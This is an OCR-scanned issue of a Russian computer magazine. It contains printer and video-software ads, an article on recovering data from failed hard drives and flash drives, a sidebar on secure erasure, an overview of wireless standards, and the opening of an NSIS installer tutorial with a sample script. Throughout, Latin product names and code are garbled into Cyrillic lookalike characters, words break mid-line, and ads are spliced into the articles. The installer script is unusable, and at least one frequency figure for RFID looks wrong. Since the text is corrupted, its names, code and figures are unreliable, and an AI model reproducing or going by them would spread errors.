(которые, например, обычно 
требуются для тіпіЗО или ТР). 
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уои сап 

Сапоп 





Гениальная идея. Вы ее вынашивали. Затем разрабатывали. И вот настало время 
показать ее миру. 

Итак, приготовьтесь удивлять - и будьте готовы удивиться возможностям новейшей 
линейки широкоформатных принтеров Сапоп. 

Оснащенные двенадцатью раздельными пигментными чернильницами (больше, чем 
в любом другом принтере данного класса) новые 17" ІРР5000 и 60" ІРР9000 способны 
на широчайший цветовой охват, обеспечивая идеальную цветопередачу и плотность цвета. 
Узнайте больше о цветных широкоформатных принтерах Сапоп, включая 17" ІРР500, 
24" ІРР600 и 36" ІРР700. Посетите наш сайтѵѵѵѵѵѵ.сапоп.ги. 

® +7 (495) 258 60 00 (Москва) 

® +7 (81 2) 326 61 00 (Санкт-Петербург) 

® 8 800 200 56 00 (для регионов звонок бесплатный) 

Масштабы впечатляют 






4 






Исключительное качество 
печати гарантировано только 
при использовании 
оригинальных чернил и бумаги 
для струйных принтеров Сапоп. 

^ ітадеРРОСРАР 




Товар сертифицирован *Вы можете 
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ХОЗЯИНОВ НИКОЛАЙ 

/ п@гІаЬ.ги / 



Вся правда 
о восстановлении 
данных 



Привет с того света 



Парадокс, но самые важные данные мы с 
завидным упорством храним на жестком диске, 
который справедливо можно назвать самой 
ненадежной частью нашего компьютера. И 
вот, когда он в очередной раз посыплется, 
мы опять будем чесать репу и винить себя 
за то, что не сделали бэкап. А быть может, 
вообще начнем паниковать, если на диске 
были данные чрезвычайной важности. 
Единственное решение в данной ситуации — 
нести накопитель специалистам и ждать, пока 
они его прооперируют. Так вот о том, как гуру 
восстанавливают данные с убитых накопителей, 
расскажет Хозяинов Николай, директор 
московской фирмы РМ_АВ. 



Невозможное возможно 

Спешу тебя обрадовать. Вне зависимос- 
ти от того, определяется ли жесткий диск 
при загрузке компьютера, раскручивает- 
ся он или нет, надежда есть всегда. Как 
в случае аппаратных, так и программных 
неполадок вероятность успешного вос- 
становления данных примерно одинакова 
и, согласно статистике В.І_АВ, составляет 
порядка 90%. Цифра, согласись, обнаде- 
живающая. 

Далее мы будем рассматривать основные 
виды проблем, которые могут случиться с 
хардом. Но, чтобы правильно понять их суть, 
стоит проинструктировать тебя о внутрен- 
нем устройстве харда. Основные его ком- 
поненты — это плата управления (она же 
контроллер) и гермоблок (так называемая 
банка). На плате находятся ОЗУ, ПЗУ, про- 
цессор и другая электроника, необходимая 
для передачи и обработки всевозможных 
сигналов, а также управления содержимым 
гермоблока. В самом гермоблоке располо- 
жен шпиндельный двигатель с одним или не- 
сколькими магнитными дисками (блинами) и 
блок магнитных головок (БМГ), с микросхе- 



мой коммутатора. Гермоблок, несмотря на 
свое название, у большинства современ- 
ных жестких дисков герметичным не явля- 
ется. Он сообщается с атмосферой через 
специальный фильтр для выравнивания 
давлений. Кроме того, внутри гермоблока 
стоит специальный фильтр, который посто- 
янно очищает находящийся внутри воздух. 
В случае повреждения поверхности блина, 
частички магнитного слоя оседают на этом 
фильтре, и он темнеет. 

Помимо исправного состояния железа, 
необходимо четкое соответствие версии 
микропрограммы в ПЗУ платы управления 
и специальной информации в служебной 
зоне жесткого диска именно этому гермо- 
блоку и плате управления. Мало этого, на 
некоторых моделях жестких дисков нане- 
сение сервометок (низкоуровневая раз- 
метка поверхности диска осуществляемая 
на заводе) выполнено таким образом, что 
для работы диска контроллеру еще нужна 
адаптивная информация, уникальная для 
каждого экземпляра этой модели. Как пра- 
вило, она содержится одновременно в ПЗУ 
и служебной зоне. 
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Специализированная 
двухпортовая плата-тестер 
РС-3000 РСІ 




Логические ошибки 

Если носитель исправен, то потеря инфор- 
мации чаще всего является результатом 
возникновения ошибок в таблице разделов 
или в структурах файловой системы. Это 
может произойти, например, из-за некор- 
ректного выключения компьютера, сбоев в 
работе программного и аппаратного обес- 
печения. В большинстве случаев данные 
при этом физически остаются на диске, но 
теряются сведения об их расположении. 
Выражается это в исчезновении одного или 
§§р.кол ьких разделов жесткого диска, отоб- 
ражении раздела с файловой системой как 
^^форматированного, исчезновении 
отдельных файлов и каталогов. К этой же 
категории относится и восстановление слу- 
чайно удаленных файлов. 

Реанимация данных осуществляется с по- 
мощью специального софта, в полуавтома- 
тическом режиме или вручную. При исполь- 
зовании полуавтоматических способов 
сначала производится сканирование всех 
данных, содержащихся на носителе. После 
чего на основе обнаруженной служебной 
информации составляется карта распо- 
ложения фрагментов восстанавливаемых 
данных. На этой карте отображены сведе- 
ния о том, какой кластер к какому файлу 
относится, а также размеры, названия и 
ие атрибуты элементов сканируемой 
файловой системы. Затем выбранные дан- 
ные переносятся (то есть восстанавлива- 
ются) на другой жесткий диск. 

В некоторых нетипичных случаях, несмотря 
на наличие данных на диске, программы их 
обнаружить не могут, и тогда в дело вступа- 
,ммы для редактирования содер- 
ска на низком уровне, а также 
руки специалиста. Например, был 
когда на ІІЗВ-флешке ни одна 
программа не могла найти нужные файлы. 
Специалист посмотрел и выяснил, что зна- 
чительная часть РАТ отсутствует, а на ее 
месте находится непонятный мусор. Во вре- 
мя дальнейшего изучения инженер обнару- 
жил недостающий кусок в конце накопите- 
ля и скопировал его на надлежащее место. 
После этого все сразу нашлось и к< 
открылось. Как могла возникнуть пі 
исправность — непонятно. 

Сбойные сектора 

Вышеперечисленные ошибки, влекущие 
за собой логическую потерю информации, 
могут возникнуть из-за наличия блоков, ко- 
торые читаются с ошибками (бэд-сектора). 
К ним добавляются ошибки чтения-записи. 
Если у тебя ни с того ни с сего перестала 




загружаться винда, то, скорее всего, это 
произошло из-за появления бэд-секторов. 
На современных накопителях всегда при- 
сутствует какое-то количество сбойных 
секторов, которые с помощью специально- 
го алгоритма исключены из использования 
и прозрачно заменены нормально работа- 
ющими секторами с резервных цилиндров. 
Если в процессе работы микропрограмма 
диска обнаруживает сектор, который на- 
чинает сыпаться, она переносит с него 
данные на резервный и вносит его в список 
сбойных секторов. Для определения того, 
что сектор посыпался, есть свои методы и 
критерии. Например, если не удается пра- 
вильно считать данные с первого раза, то 
он чаще всего считается сбойным. Таким 
образом, здоровье диска определяется, 
скорее, не наличием бэдов, а скоростью их 
появления. Бэды становятся видимыми, ког- 
да кончаются резервные секторы или алго- 
ритм замены не срабатывает должным об- 
разом. Если количество бэдов небольшое 
(меньше 50-ти), то восстановление данных 
можно провести теми же средствами, как и 
в случае логических ошибок. Если же бэдов 
много, то лучше снять посекторную копию 
на другой винт и затем работать уже с ней. 
Кроме того, существуют программно-ап- 
паратные комплексы, специально предна- 
значенные для вычитывания информации с 
дисков, имеющих бэд-сектора. Используя 
различные способы, они позволяют считы- 
вать из бэд-секторов информацию, доступ к 
которой не удается получить обычным спо- 
собом. В специализированных организаци- 
ях для работы с посыпавшимися дисками 
используется именно такое оборудование. 

Ошибки в служебной информации 

Нередко встречаются ситуации , когда нако- 
питель физически исправен, но нормально 
не функционирует из-за сбоя в работе мик- 
ропрограммы контроллера. В такой ситуа- 
ции жесткий диск не определяется в ВІОЗ 
или определяется неправильно, может из- 
давать странные звуки, например, стучать. 
Иногда носитель определяется корректно, 
но при дальнейшей загрузке ВІ08 опять 
же выдает ошибку. Причины появления 
ошибок в служебке могут быть разными: 
начиная от неправильного реагирования на 
переполнение таблицы бэдов и заканчивая 
производственным браком при пайке про- 
цессора. 

Или вот другой пример. В результате скач- 
ка напряжения сгорела плата управления 
на жестком диске (при этом коммутатор и 
головы, что часто бывает, остались целы- 
ми). Опытный админ решил попробовать 
восстановить данные самостоятельно. Для 
этого он купил такой же диск и перекинул 
контроллер на сгоревший. Только он не 
учел того, что у них разная карта голов и вер- 
сии микропрограмм отличаются. У диска 
внутри один блин, но у одного экземпляра 



Самый главный миф 
о восстановлении данных 

Миф: Любые удаленные данные можно 
восстановить на основании остаточной 
намагниченности на краях дорожек. Она 
появляется из-за того, что головка не 
позиционируется с абсолютной точностью 
и всегда есть небольшое смещение. 

В доказательство обычно приводятся непонятные 
фотографии магнитных полей на старых дисках 
малой емкости (порядка сотен мегабайт). 

Наш ответ: миф чистейшей воды. Теория, 
конечно, не исключает возможности 
восстановления данных, просто практически 
это представляется неимоверно дорогой 
затеей, которая вообще никак не гарантирует 
успех и, скорее всего, приведет к получению 
бессмысленной мешанины отрывков 
информации. Ну, скажем, остаточную 
намагниченность удалось считать с краев 
нескольких секторов. Что дальше? От каких 
записей эти куски? Недельной или, может, 
годовалой давности? Части ли это одного файла 
или разных, как они соотносятся между собой? 
Одни вопросы и абсолютно никаких ответов. 

Но это еще не все. Для того чтобы получить 
эту мешанину, потребуется корректно 
интерпретировать и обработать полученную 
информацию о напряженностях магнитного 
поля, решить проблему отделения технической 
информации от пользовательской, декодировать 
(просто так ничего на харде не хранится — для 
записи используется целый набор алгоритмов 
сжатия и кодирования). В общем, ввиду ряда 
особенностей устройства жестких дисков, 
стоимость этой операции сопоставима со 
стоимостью разработки новой модели диска, 
и результат будет применим только к этой 
конкретной модели. 

Точно так же нельзя восстановить данные с 
куска блина или склеить разбитый блин и считать 
информацию оттуда. Поэтому, если услышишь: 
«Есть умельцы, которые это делают. Воту меня 
брат такого знает, он работает в ФСБ», отправляй 
его куда подальше — он гонит. 
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голова расположенасверху,аудругого — снизу. 
Запустив диск после перекидывания кон- 
троллера, админ незаметно для себя стер 
с винта всю служебную информацию и 
прибавил работу настоящему специалис- 
ту. Чтобы избежать этого печального ре- 
зультата, нужно предварительно залить в 
ПЗУ правильную версию микропрограм- 
мы исправного контроллера. Делается 
это, как правило, с помощью специализи- 
рованного оборудования и программного 
обеспечения. На нем же восстанавли- 
вается и содержимое служебной зоны 
диска. После этого, в случае отсутствия 
других неисправностей, диск работает 
нормально. 

Совсем по-другому производятся работы, 
если микропрограмма не может читать 
служебную информацию из-за наличия 
бэдов. При таком раскладе используются 
самые экзотические методы, доступные 
специалистам. О них рассказывать нет 
смысла. 

Неисправный контроллер 

Выход контроллера из строя может про- 
изойти по разным причинам, втом числе 
из-за скачка напряжения, банального 
перегрева и производственного дефек- 
та. При этом диск стучит или не опре- 
деляется при загрузке компьютера. А 
может, даже не раскручиваться. 

Работа по восстановлению данных, в ос- 
новном, заключается в замене или ремонте 
контроллера. Иногда требуется также пе- 
репрошивка микропрограммы или другой 
служебной информации. После ремонта 
данных происходит, как с 
накопителя. 



Неисправности в гермозоне 

Этот тип неисправности чаще всего вы- 
зывает стук или скрежет в гермоблоке. 
Исключение — залипание головок и клин 
двигателя (в этом случае диск не раскру- 
чивается). Накопитель может как опре- 
деляться, так и не определяться ВІОЗ’ом. 
При выходе из строя одной или несколь- 
ких магнитных головок или коммутатора 
для восстановления данных требуется 
вскрытие гермоблока и замена всего 
БМГ с коммутатором. В редких случаях, 
при выходе из строя коммутатора и ис- 
правных головках, БМГ не меняется, и 
производится перепайка коммутатора с 
исправного блока. 

В случае залипания производится вскры- 
тие гермозоны и отвод головок в зону 
парковки. Заклинивание двигателя ус- 
траняется ремонтом или пересадкой 
блинов на исправный накопитель. После 
этого с диска производится копирование 
информации. В специализированных 
организациях для этого, как правило, 
используется то же оборудование и про- 
граммы, что и для работы с посыпавши- 
мися дисками. 

Работы со вскрытием гермозоны реко- 
мендуется проводить в специальных по- 
мещениях с высочайшим уровнем чис- 
тоты или сконструированных для этих 
целей небольших камерах (аквариумах). 
Однако нередко работы осуществляются 
в обычном помещении, после чего перед 
закрытием крышки гермоблок продувает- 
ся чистым воздухом из баллона. 

Практика показывает, что достигнутого 
таким образом уровня чистоты достаточ- 
но для нормальной работы диска в тече- 
ние десятков часов. 

После вскрытия гермоблока диск, в отли- 
чие от других случаев, к дальнейшему ис- 
пользованию не пригоден. Специалистам 
остается только считать данные и, грубо 
говоря, выкинуть его. Причина этого — 
недостаточный уровень точности и чис- 
тоты, необходимый для надежной работы 
диска. Такой уровень достижим только на 
заводе производителя. 

Именно на выход из строя БМГ приходит- 
ся большая часть случаев, когда восста- 
новить данные невозможно. Головка при 
выходе из строя запиливает поверхность 
блина, и все драгоценные данные в бук- 
вальном смысле слова оседают на филь- 
тре в виде серого налета. 

В связи с конструктивными свойствами и 
особенностями работы жестких дисков 
достаточно одного «запила» (не всей по- 
верхности, а лишь одной небольшой час- 
ти) для того, чтобы данные оттуда считать 
было невозможно. Или, по крайней мере, 
невозможно в рамках разумных финансо- 
вых затрат. Все это происходит потому, 
что головка при попадании в запиленную 
область мгновенно выходит из строя. 



На диске ты найдешь весь софт, 
необходимый для восстановления 
данных, а также материалы по 
теме. 
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Беспощадная расправа с данными 



Для того чтобы гарантированно удалить данные с диска, 
его не надо привязывать к атомной бомбе и взывать. 

Вполне достаточно записать что-нибудь на то место, 
где хранилась конфиденциальная информация, пускай 
даже забить нулями. Это называется зесиге егазе’ом и 
поддерживается массой программ. Асгопіз Эгіѵе СІеапзег 
( ѵѵѵѵѵѵ.асгопіз.ги ). к примеру, поддерживает 7 алгоритмов 
безопасного удаления данных, в том числе многопроходных. 
«Восстановить данные после такого безобразия уже не 
удастся, даже частично» , — говорят ведущие специалисты 
в этой области. 




тек п-ѵ^ 



Компактная термокамера для операций в гермозоне НЖМД 
обеспечивает класс чистоты 1 00. На фотографии представ- 
лена термокамера, находящаяся в лаборатории компании ІТ- 
Тоітіогіі: ОУ (Хельсинки, Финляндия), любезно предоставленная 
одним из ее сотрудников, Станиславом Корб. Изготовление 
такой термокамеры стоило компании 4500 евро. 
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Оаггіе* 



Перезапись с ѴНЗ на 0Ѵ0 
Запись с видеокамеры 
^ Запись с телевизора на компьютер 
Высокое качество оцифровки 

Создание видео для мобильных 
устройств (ІРОСІ, РЗР, телефоны) 

Самый удобный 
путь к видео 
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Оаггіе* 

ѴН** <Г*Л№ Р1 ‘ СТШЯ 
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№ 



Оаггіе ОѴР 
Песогсіег 

Видеоконвертер 
для современных 
компьютеров 



Оаггіе ѴШео 

Сгеаіог 

в идео конвертер 
0 минимальной 
нагрузкой на ПК 
(аппаратный 
МРЕО-1,2) 



Оаггіе ѴісІео 
Сгеаіог Ріаііпит 

в идео конвертер 
о минимальной 
нагрузкой на ПК 
(аппаратный 
МРЕСМДД/ОіѵХ) 




В каждом комплекте 

ріппасіе 

81 исІіо 



Официальный предстэаителье России 




мииті м е □ і а сшв 



Эксперіы □ «іулыинедин с ШЧ1 



Тел-(495) 7ЙЗ-55-45 
Е-ггіаіІ: ЬеаІег@фі пшсіеіуа.т 

Полный ітнсжпэршерм 
смотрите на сайте ичѵъѵ.ріпшсІеЕуа.т 
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ЫХ 

флѳшѳк используется специальные про- 
грамматоры, на которых считывается 
содержимое выпаянной флеш-памяти. 
Специально разработанный для этих 
целей программатор производится мос- 
ковской фирмой ЗоЙ-Сепіег. Основная 
трудность восстановления данных в этом 
случае — декодирование. Данные при 
записи на микросхему располагаются 
определенным, меняющимся от модели к 
модели, способом. Производители о спо- 
собах кодирования не рассказывают и, по 
всей видимости, рассказывать не собира- 
ются. Поэтому когда приносят на восста- 
новление флешку новой модели, сначала 
требуется определенное время, чтобы 
разобраться, каким образом на ней рас- 
положены данные. Другой вариант восста- 
новления — найти точно такую же флэшку 
и перепаять на нее память со сгоревшей. В 
этом случае не нужно заниматься дешиф- 
рованием. Задачу значительно усложняет 
тот факт, что модельные ряды флэшек 
меняются очень часто. Найти точно такую 
же зачастую очень сложно или вообще не- 
возможно. 



Инструментарий специалиста 

Основными инструментами грамотного 
специалиста по восстановлению данных 
являются голова и прямые руки. Следую- 
щим по важности является программно- 
аппаратный комплекс, который использу- 
ется при диагностике и ремонте. Именно 
на этом оборудовании, в технологических 
режимах работы накопителей и произ- 
водятся такие операции, как, например, 
перепрошивка ПЗУ-контроллера и вос- 
становление служебной информации. Как 
правило, комплекс представляет собой 
специальную плату, которая вставляется 
в РСІ-слот обычного компьютера, и набор 
программного обеспечения. Совместно с 
этим оборудованием используются раз- 
личные кабели, переходники, контролле- 
ры управления питанием. Существует два 
наиболее известных у нас в стране комп- 
лекса: РС-3000, производства Ростовской 
фирмы АСЕІ_аЬ, и комплекс НРТ, который 
производит московская ВѴО-Сгоир. Они 
используются для работы с ЮЕ- и ЗАТА- 
дисками, а для ЗСЗІ-интерфейса доступен 
ЗСЗІ-тестер производства АСЕІ_аЬ. Эти же 
комплексы закупаются и успешно исполь- 
зуются в работе ведущими зарубежными 
компаниями. 

Некоторые специалисты не пользуются по- 
купными комплексами, а пишут свои про- 
граммы для аналогичных целей (с диском в 
технологическом режиме можно работать 
и на обычном контроллере). Серьезными 



•Ыв 




Огромное спасибо 
компании В.ЬАВ за 
гостеприимный прием 
нашей команды (Ыікііоз, 

Зіер, ѲогІ). Парни во всех 
подробностях рассказали 
нам о восстановлении 
данных с НОЭ/ВАЮ/ 
флеш-накопителей, 
показали оборудование и 
используемый софт, а позже 
напоили нас чаем с тортиком 
и просто составили веселую 
компанию. 

Ознакомиться с их услугами 
ты сможешь на сайте 

ѵѵѵѵѵѵ.гІаЬ.ги. 

Рекомендуем! 




организациями в основном практикуется 
комплексный подход — используются воз- 
можности РС-3000 и НРТ, плюс софт, раз- 
работанный самостоятельно и совместно 
с партнерами, так какесть задачи, которые 
серийные комплексы решить пока не в со- 
стоянии. К примеру, ни в РС-3000, ни в НРТ 
нет возможности работать с дисками про- 
изводства Соппег ТесИпоІоду (был такой 
производитель), и для этих целей нашим 
сотрудником была написана специальная 
утилита. Сейчас она лежит в свободном 
доступе на сайте НДрѴ/гІаЬ.гиЛіІез/ . Кроме 
того, в арсенал средств восстановителя 
входят различные программаторы для мик- 
росхем других типов, обычные паяльные 
станции, паяльные станции на горячем воз- 
духе, электрические тестеры, микроско- 
пы, осциллографы, пылезащитные боксы, 
плюс всякий мелкий инструмент типа 
хитрых пинцетов и съемников, 
отверток всяких. 

Активно при- 
меняется и об- 
щеизвестный 
софт. С нашей 
точки зрения, 
лучшими являются 
продукты Р-Зіисііо 
и ЕазуРесоѵегу. Для 
ковыряния диска на 
нижнем уровне обыч- 
но используется попу- 
лярный шестнадцате- 
ричный редактор ѴѴіпНех. 

Помимо этого активно ис- 
пользуются собственные 
разработки, а также софт, 
который идет со специализи- 
рованным железом. 

Не теряй надежду 

Разумеется, мы не ставили себе цель на- 
учить тебя восстанавливать убитые жест- 
кие диски — оставь это профессионалам. 
Но, прочитав статью, ты должен понять, 
насколько сложна работа специалистов 
по восстановлению данных. Используе- 
мые методы требуют многолетнего опыта и 
кропотливой работы. Но зато теперь ты по- 
нимаешь общие принципы и можешь сме- 
ло нести умерший хард на реанимацию, с 
уверенностью, что данные, скорее всего, 
удастся восстановить, зс 
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УСТРОИМ ПРОВОДАМ 



Технология: ѴѴі-Рі 

Сегодня оборудование для беспроводного до- 
ступа в Сеть устанавливают повсеместно: дома, 
в офисах, во всевозможных гостиницах, кафе 
и ресторанах. В развитых странах хотспоты на 
базе ѴѴі-Рі никто не считает — они есть везде. 
Просто приходишь в кафе, соединяешься с 
ближайшей точкой доступа и можешь беспре- 
пятственно серфить инет. Группа стандартов 
802. 1 1 полностью описывает технологию ѴѴі-Рі и 
гарантирует совместимость оборудования раз- 
личных производителей. В частности, девайсы 
на базе 802.1 1 д позволяют передавать данные 
со скоростью до 54 Мбит/с. Реальная пропуск- 
ная способность существенно ниже, но доста- 
точна для передачи любых данных, в том числе 
и для мультимедийных. В качестве рабочей 
частоты используется диапазон от 2,400 МГ ц до 
2,483 МГ ц. В большинстве стран эти частоты не- 
лицензируемы, и их без разрешения может ис- 
пользовать любой желающий. Радиус действия 
сети составляет от 50 до 1 00 метров, что вполне 
достаточно для любого помещения. 





Технология: ѴѴіМАХ 

Дата разработки:2004 

Небольшой радиус действия и отсутствие нор- 
мального роуминга препятствуют использованию 
ѴѴі-Рі на больших расстояниях. Этих недостатков 
л пшена технология ѴѴіМАХ (стандарт ІЕЕЕ 802. 1 6). 
Подобно сотовой связи, она позволяет покрыть 
сигналом площадь радиусом до 50-ти километров 
и, что особенно важно, даже в отсутствии прямой 
видимости. Пропускная способность ѴѴіМАХ тео- 
ретически составляет 70 Мбит/с, но в зависимос- 
ти от условий реальные цифры колеблются от 500 
Кбит/с до 2 Мбит/с. Спецификация ІЕЕЕ 802.16 
предполагает применение частотного диапазона 
2-1 1 ГГ ц, поддержку шифрования по алгоритмам 
Тгіріе ОЕ5 (длина ключа 1 28 бит) и Р5А (длина клю- 
ча 1 024 бит), а также автоматическое управление 
мощностью излучения. Сетей на базе ѴѴіМАХ пока 
немного. Намного чаще технологию используют 
для соединения точек доступа ѴѴі-Еі, расположен- 
ных на большом расстоянии. Эта тенденция со- 
хранится в ближайшие годы. 



Технология: ЫРС 



Дата разработки: 2002 



Знакомься: радиочастотная связь ближнего 
действия (Ыеаг Еіеіб Соттипісаііоп, ЫРС). Рас- 
стояние, на котором передаются данные, дейс- 
твительно смехотворное, — всего 10-12 см. Но 
фишка ЫЕС — в удобстве использования. Для ус- 
тановки соединения между двумя устройствами 
вообще не требуется каких-либо усилий. Чтобы 
начать передачу данных, достаточно поднести 
девайсы друг к другу на небольшое расстояние. 
Так, если ЫЕС-цифровик окажется рядом с ІЧЕС- 
телевизором, то начнется передача фотогра- 
фий. А если ЫЕС-кредитку поднести к терминалу 
оплаты в магазине или на станции метро — на- 
чнется банковская транзакция. Очень скоро мы 
получим сотовый телефон, оснащенный ЫЕС- 
чипом, который будет выполнять задачи кредит- 
ной карточки. И вот еще: для передачи данных в 
І\ІЕС используется частота 1 3,56 МГ ц, а скорость 
связи составляет 21 2 Кбит/с. 
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Оснащенные ЫЕС-адаптером ТВ 
смогут легко считывать фотогра- 
фии с цифровиков и сразу отобра- 
жать их на экране 
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Технология: ВІиеІооІН 



Дата разработки: 1 999 



Стандарт де-факто для связи между устройствами 
на небольшом расстоянии. Любой современный 
гаджет, будьте карманный компьютер, мобильный 
телефон, ноутбук ил и принтер навернякаоснащен 
модулем ВІиеІооШ. Ценатакого модуля копеечная, 
но зато с его помощью можно легко передавать 
данные на расстояние до 10 — 1 00 метров. Исполь- 
зуемый диапазон частот (2400 — 2483,5 МГ ц) иден- 
тичен тому, что используется в ѴѴі-Рі, но конфлик- 
ты между оборудованием исключены. ВІиеІооІН 
использует очень слабый сигнал — всего в один 
милливатт, и, более того, в основе технологии ле- 
жит механизм псевдослучайного переключения 
частот. Любое устройство, оснащенное ВІиеІооІН- 
модулем, одновременно работает лишь на одном 
из 79-ти каналов и переключается между ними 
1600 (!) раз в секунду. Максимальная пропускная 
способность у ВІиеІооІН составляет 232 Кбит/с. 



О ВІиеІооІІі 





Технология: ПГЮ 

Дата разработки :1960-е 

Технология радиочастотной идентификации 
(Насііо Ргециепсу ІбепІіРсаІіоп, сокращенно НРЮ) 
разрабатывалась очень давно, но широкое рас- 
пространение получила недавно. Чаще всего ее 
применяют на различных складах и в производс- 
тве, где регулярно требуется идентифицировать 
полученный груз, прибывшие машины и другие 
объекты. Сейчас же известны прецеденты, когда 
НРЮ-чипы имплантировались в тело человека для 
постоянного контроля над его передвижениями. 
Любой РіРЮ-чип — это миниатюрный передатчик 
(обычно тонкая наклейка), который на регуляр- 
ной основе передает в эфир некий идентифика- 
ционный код. В нужных местах расставляются 
специальные сканеры, которые слушают частоту 
23,56 МГ ц, и поэтому легко считывают идентифи- 
кационный код с передатчиков и таким образом 
идентифицируют объекты. Просто, дешево и без- 
отказно. 



Технология: ЗС 



Дата разработки: 20< 



Все технологии сотовой связи условно делятся 
на несколько поколений. СЗМ — это второе поко- 
ление, которое, признаться, порядком устарело, 
поэтому во всем мире идет развертывание новых 
сетей на базе технологий третьего поколения 
(ЗС): СОМА2000 и ѴѴ-СОМА. Их основное преиму- 
щество — огромная полоса пропускания между 
абонентом и базовой станцией. Она достигает 2-х 
Мбит/с для стационарных абонентов и 394-х Кбит/с 
для постоянно передвигающихся. Такие скорости 
позволяют устраивать видеоконференции, смот- 
реть ТѴ в хорошем качестве, пользоваться быс- 
трым инетом. В основе сетей ЗС лежит принцип 
СОМА — множественный доступ с кодовым разде- 
лением. Все абоненты при такой организации не- 
прерывно используют всю ширину канала, но для 
каждого из них назначается свой уникальный код. 
Поэтому оператор легко может дифференциро- 
вать их, не прибегая к временному или частотному 
разделению. 
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ВСТРЕЧАЮТ, КАК ИЗВЕСТНО, ПО ОДЕЖКЕ, А ПРОВОЖАЮТ ПО УМУ. И 
ЧЕЛОВЕКА, И КОМПЬЮТЕРНУЮ ПРОГРАММУ — ТОЖЕ. ПУСКАЙ МАТЕРОГО 
КОМПЬЮТЕРЩИКА НЕ ИСПУГАТЬ ГЕМОРРОЕМ С УСТАНОВКОЙ ДОПОЛНИ- 
ТЕЛЬНЫХ БИБЛИОТЕК И ДРАЙВЕРОВ, НО МЕНЕЕ ИСКУШЕННЫЙ ПОЛЬЗО- 
ВАТЕЛЬ НАВЕРНЯКА ТАКИХ МАНЕВРОВ ИСПУГАЕТСЯ. ПЛЮНЕТ И ВЫБЕРЕТ 
ДРУГОЙ ПРОДУКТ — С УДОБНЫМ ИНСТАЛЛЯТОРОМ, КОТОРЫЙ ВСЕ СДЕ- 
ЛАЕТ ЗА НЕГО. ВОТ ТАКОЙ ИСТЯЛЛЯТОР МЫ СЕГОДНЯ И СОЗДАДИМ. 



создаем крутой инсталлятор с помощью ічыъ 



не изобретай велосипед 

Возьмем, к примеру, программу на МісгозоК ѴізиаІ С++, напи- 
санную с использованием библиотеки МРС. Понятно, что студия 
установлена далеко не у всех и не всегда, соответственно, нужные 
ООЬ'ки — тоже. При этом ставить и регистрировать либы придется 
в любом случае: без них прога не заработает. А может, они уже 
имеются в системе? Тогда придется их обновлять. Все это нужно 
учитывать во время установки, чем и занимаются установочные 
пакеты. 

Конечно, самый навороченный инсталлятор, отвечающий всем 
твоим требованиям, можно написать самому. Но, используя спе- 
циальные утилиты, ты реально сэкономишь время, не говоря 
уже о том, что это поможет избежать дополнительных багов. 
Подходящих утилит довольно много, как коммерческих, так и 
бесплатных. Даже если ты никогда не создавал инсталляторы сам, 
то встречался с ними, устанавливая всевозможные приложения. 
Однако среди многочисленных ІпзІаІІег2Ѳо, Іппо ЗеШр, ѴѴіХ, ІпзІаІІ 
ЗОіеІб есть один продукт, который заслуживает всяческих похвал 
и особого внимания. Он просто умеет все! И имя ему — ЫиІІзоЙ 
ЗсгірІаЫе ІпзІаІІ Зузіет (N313). 



КРАСАВЕЦ-МОЛОДЕЦ, НАСТОЯЩИМ ОГУРЕЦ 

N313 изначально создавался как инсталлятор для ѴѴіпатр, а позже 
перерос в отдельный проект под названием РіМР (ріидіп Міпі 
Раскадег). Впоследствии он был переименован и перенесен на 
Зоигсеіогае.пеі (репозитарий программ с открытыми исходниками). 
Лицензия №ІІзоГС’а предоставляет разработчикам неограниченные 
возможности, поэтому созданные инсталляторы ты можешь смело 
использовать в любых, в том числе коммерческих целях. 

И все же N313 лучший не из-за того, что был выпущен из недр 
№ІІзоК. В первую очередь, это простой в использовании, ком- 
пактный, многофункциональный и бесплатный инсталлятор, для 
которого вдобавок ко всему существует множество редакторов 
скриптов, надстроек, плагинов и прочих полезностей. Недаром с 
его помощью созданы дистрибутивы для ѴѴіпатр, видеокодека 
йіѵХ, ІСОклиента Мігапсіа, Р2Р-клиента еМиІе, РНР для ѴѴіпбоѵѵз 
и т.д. Попробую перечислить те возможности, за которые N313 так 
полюбилась разработчикам: 

• Возможность создания инсталляторов для любых версий ѴѴіпбоѵѵз 
(официально 95 — 2003 Зегѵег). Неофициально N313 отлично рабо- 
тает в ѴѴіпбоѵѵз Ѵізіа, проверял сам. 
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Страница выбора каталога для уста- МакеІЧІЗІЗѴѴ — стандартное ОІЛ компи- 
новки лятора скриптов 



Сжатие файлов дистрибутива встроен- 
ными алгоритмами архивации 2І_іЬ, В2ір2 
и І_2МА. Последний делает N313 самым 
компактным инсталлятором в мире и поз- 
воляет создавать пакеты с размером уста- 
новочного блока 34 килобайта. 

• Поддержка огромного количества языков, 
включая русский и украинский. 

• Различные проверки целостности, зави- 
симостей и ключей реестра благодаря про- 
двинутому языку сценариев. 

• Поддержка плагинов (стоит только поис- 
кать на зоигсеіогде.пе* — и ты удивишься 
их разнообразию). 

• Возможность создания ѵѵеЬ-инсталлято- 
ров (например, докачивающих зависимос- 
ти с сайта производителя), обновление 
файлов установочного архива и т.д. 

• Начиная с версии 2.01, N313 можно соб- 
рать на любой платформе с поддержкой 
стандарта РОЗІХ. Другими словами, инс- 
талляторы для ѴѴіпсІоѵѵз с помощью N313 
можно творить даже в Ыпих и РгееВЗБ, не 
используя эмулятор ѴѴіпе. 

НеІІо ѵѵогісі! 

Теперь всю эту функциональность нужно 
прочувствовать на себе. А поэтому опе- 
ративно приступаем к практике, в рамках 
которой создадим свой первый установоч- 
ный пакет. Параметры будущего инсталля- 
тора можно описать в блокноте, но я все 
же предпочитаю более удобные средства. 
Например, специальный редактор скриптов 
для N313 — НМ N13 Есііі. Итак, наш скрипт. 

; Заставим надписи в инсталляторе отображаться 
; на русском языке 

;${ЫЗІЗОІВ} - путь к каталогу с установленным 
; N313 

І_оасІІ_апдиадеРіІе «${М5І50ІВ}\СопІгіЬ\І_апдиаде 
ЛІезѴВиззіап.пК» 

;Имя инсталлятора 
Ыагпе «Ехатріеі » 

; Выходной файл инсталлятора 
ОіЛРіІе «Ехатріеі .ехе» 

; Каталог для установки по умолчанию 
Іпз*аІЮіг$РВО<ЗВАМРІІ_Е5\ЕхатрІе1 
; Страницы выбора каталога для установки 
Раде сМгесІогу 

; Завершающее окно с логом работы 
Раде іпзШІез 

Зесііоп «» ; Имя секции можно не указывать 
;Определяем путь инсталяционного каталога 
ЗеЮиІРаіІі $ІЫЗТ0ІВ 

Определяем, какие файлы будут в этот каталог 

; перемещены 

Рііеехатріе.ехе 

; Если бы было необходимо скопировать 
; несколько файлов, то разумнее использовать 
; следующий шаблон: Рііе/г*.* 

